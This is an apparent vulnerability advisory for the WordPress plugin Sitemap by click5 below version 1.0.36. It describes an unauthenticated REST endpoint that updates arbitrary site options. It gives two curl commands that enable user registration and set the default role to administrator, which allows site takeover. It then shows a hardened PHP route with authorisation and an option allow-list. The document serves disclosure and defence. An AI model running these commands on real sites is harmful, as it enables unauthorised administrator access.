wpexploit | Cydave | WPEX-ID:0F694961-AFAB-44F9-846C-E80A0F6C768B
Apr 11, 2022 - 12:00 a.m.

Sitemap by click5 < 1.0.36 - Unauthenticated Arbitrary Options Update

Tags: sitemap by click5, unauthenticated, options update, user registrations, default role, administrator, exploit, curl

EPSS: 0.48 (percentile: 97.5%)

The plugin does not perform authorisation or CSRF checks when updating options via a REST endpoint, and does not ensure that the option being updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as users_can_register and default_role, allowing them to create a new admin account and take over the blog.

Allow user registrations:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
    -H 'Content-Type: application/json' \
    --data '{"users_can_register": 1}'

Set the default user role to administrator:
curl 'https://example.com/?rest_route=/click5_sitemap/API/update_html_option_AJAX' \
    -H 'Content-Type: application/json' \
    --data '{"default_role":"administrator"}'
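For comparison, a hardened route registration that adds the three checks the description says are missing (authorisation, CSRF protection, option ownership). This is an added example, not the plugin's code or its actual fix; the allow-list entries, the function names, and the way the URL is split into namespace and route are assumptions.

```php
<?php
// Added illustration, not the plugin's code. The allow-list entries and function
// names are hypothetical; the namespace/route split of the URL is an assumption.
const EXAMPLE_OWNED_OPTIONS = array(
    'click5_sitemap_example_display' => 'bool',   // hypothetical option name
    'click5_sitemap_example_title'   => 'string', // hypothetical option name
);

add_action( 'rest_api_init', function () {
    register_rest_route( 'click5_sitemap/API', '/update_html_option_AJAX', array(
        'methods'             => 'POST',
        'callback'            => 'example_update_owned_options',
        // Authorisation: only users allowed to manage site options may call this.
        // For cookie-authenticated requests WordPress core keeps the user logged in
        // only when a valid REST nonce (X-WP-Nonce) is sent, so a cross-site request
        // without the nonce reaches this check as an anonymous user and is refused.
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
    ) );
} );

function example_update_owned_options( WP_REST_Request $request ) {
    $params = $request->get_json_params();
    if ( ! is_array( $params ) || empty( $params ) ) {
        return new WP_Error( 'invalid_body', 'Expected a JSON object.', array( 'status' => 400 ) );
    }
    // Validate every key and value before writing anything, so a request that mixes
    // an owned option with users_can_register or default_role changes nothing.
    foreach ( $params as $name => $value ) {
        if ( ! array_key_exists( $name, EXAMPLE_OWNED_OPTIONS ) ) {
            return new WP_Error( 'option_not_allowed', 'Option is not owned by this plugin.', array( 'status' => 400 ) );
        }
        if ( ! is_scalar( $value ) ) {
            return new WP_Error( 'invalid_value', 'Option values must be scalar.', array( 'status' => 400 ) );
        }
    }
    foreach ( $params as $name => $value ) {
        $clean = ( 'bool' === EXAMPLE_OWNED_OPTIONS[ $name ] )
            ? (int) (bool) $value
            : sanitize_text_field( (string) $value );
        update_option( $name, $clean );
    }
    return rest_ensure_response( array( 'updated' => array_keys( $params ) ) );
}
```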
